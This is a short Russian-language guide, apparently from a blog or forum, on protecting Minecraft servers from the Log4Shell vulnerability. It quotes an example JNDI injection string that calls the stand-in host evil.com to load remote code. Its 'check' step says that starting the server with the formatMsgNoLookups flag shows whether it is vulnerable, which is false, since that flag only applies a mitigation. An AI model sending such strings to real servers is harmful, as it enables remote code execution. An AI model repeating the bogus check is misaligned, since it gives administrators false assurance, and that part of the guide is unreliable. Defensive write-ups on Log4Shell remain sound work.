Как защитить сервер Minecraft от уязвимости Log4Shell (CVE-2021-44228)
Как защитить сервер Minecraft от уязвимости Log4Shell (CVE-2021-44228)
Log4Shell — это критическая уязвимость в библиотеке Log4j, которая позволяла хакерам выполнять произвольный код на сервере. Хотя патчи вышли, некоторые старые сборки всё ещё уязвимы.
Что такое Log4Shell?
Уязвимость позволяла злоумышленнику отправить в чат строку вида ${jndi:ldap://evil.com/exploit} и получить удалённый доступ к серверу.
Проверка уязвимости
Войдите в консоль сервера и выполните:
java -Dlog4j2.formatMsgNoLookups=true -jar server.jar
Если сервер запускается без ошибок — вы в безопасности.
Защита
Обновите ядро сервера до версии, где исправлена уязвимость (Paper 1.18.2+, Spigot 1.18.2+).
Если обновление невозможно, добавьте в скрипт запуска:
-Dlog4j2.formatMsgNoLookups=true -Dlog4j2.configurationFile=log4j2.xml
И настройте log4j2.xml, отключив JNDI Lookups.
💬 Комментарии (0)
🔒 Войдите, чтобы оставить комментарий
😊 Пока нет комментариев. Будьте первым!